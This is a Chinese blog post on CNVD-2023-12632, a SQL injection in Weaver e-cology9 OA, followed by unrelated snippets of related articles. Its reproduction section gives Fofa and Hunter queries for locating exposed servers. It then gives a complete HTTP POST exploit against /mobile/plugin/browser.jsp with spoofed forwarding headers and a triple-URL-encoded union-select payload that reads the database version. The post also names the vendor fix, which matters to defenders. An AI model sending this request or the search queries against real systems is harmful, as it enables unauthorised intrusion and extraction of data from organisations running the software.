CNVD-2023-12632 泛微e-cology9 sql注入 附poc

news/2025/2/2 3:01:19/

目录

  • 漏洞描述
  • 影响版本
  • 漏洞复现
  • 漏洞修复

漏洞描述

泛微 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。


影响版本

泛微e-cology V9 < 10.56


漏洞复现

Fofa:app="泛微-协同商务系统"
Hunter:title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"

查询数据库版本信息,执行语句需要进行三次url编码。
在这里插入图片描述POC:

POST /mobile/plugin/browser.jsp HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

批量检测脚本:
在这里插入图片描述


漏洞修复

官方修复方案:
https://www.weaver.com.cn/cs/securityDownload.asp#


http://www.ppmy.cn/news/345971.html

相关文章

小于 n 的最大数

文章目录 1.问题描述2.难度等级3.热门指数4.解题思路5.实现示例5.1 C5.2 Golang 参考文献 1.问题描述 数组 A 中给定可以使用的 1~9 的数&#xff0c;返回由数组 A 中的元素组成的小于 n 的最大数。 示例 1&#xff1a;A{1, 2, 9, 4}&#xff0c;n2533&#xff0c;返回 2499。…

Android中使用正确参数构建StatFs对象

Android 2.3.3 Eclipse Version: 3.7.0 LogCat LogCat 报错信息&#xff1a; 02-14 11:54:12.834: ERROR/(2525): statfs htc failed, errno: 202-14 11:54:12.844: WARN/System.err(2525): java.lang.IllegalArgumentException02-14 11:54:12.853: WAR…

期末复习C语言2020.12.24

1自守数&#xff08;10分&#xff09; 问题描述&#xff1a;若一个整数a满足条件a*a的尾数等于a则称a为自守数&#xff0c;例如 2525625&#xff0c;76765776&#xff0c; 9376*937687909376 都是自守数。编写程序&#xff0c;求n以内所有自守数。 输入&#xff1a;从键盘随…

JZOJ 5485 字符串

Description 一个字符串的权值是这个串包含的不同字符个数。 给定一个长度为 n 的字符串,把它分为k个连续非空字段&#xff0c;每个字符必须在某一段中&#xff0c;此字符串的权值和为这 k 个连续非空字段的权值的总和,最小化字符串的权值和。Data Constraint1< k <=…

bzoj-2525 Dynamite

题意&#xff1a; 给出一颗n个结点的树&#xff0c;上面有若干个关键结点&#xff1b; 现在可以在这些结点上选最多m个点&#xff0c;求最小化关键点到选择点的最大距离&#xff1b; 题解&#xff1a; 首先这道题是一个最大最小化的问题&#xff0c;很容易想到二分&#xff…

【定位问题】chan算法多基站目标定位【含Matlab源码 2525期】

⛄一、chan+taylor算法移动基站无源定位简介 1 引言 随着无人机的普及,低空空域的安全问题受到人们的极大关注.针对该问题,本研究对“非合作型”无人机采用一种基于时差法的无源定位算法对其进行实时定位.基于时差法的无源定位方法是根据求解无人机信号到达主站和各辅站的…

golang cpu 内存分析

top命令可以查看cpu使用情况的前几名 list 函数名 可以查看函数的cpu使用情况 最后一列为函数名称&#xff0c;其他各项内容意义如下&#xff1a; flat:当前函数占用CPU的耗时 flat%:当前函数占用CPU的耗时百分比 sum%:函数占用CPU的累积耗时百分比 cum&#xff1a;当前函…

杭电2525

Clone Wars Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others) Total Submission(s): 244 Accepted Submission(s): 45 Problem Description 逐青曾经很喜欢玩战略游戏&#xff0c;有一段时间他一直泡在自己发现的一个游戏《克隆人大…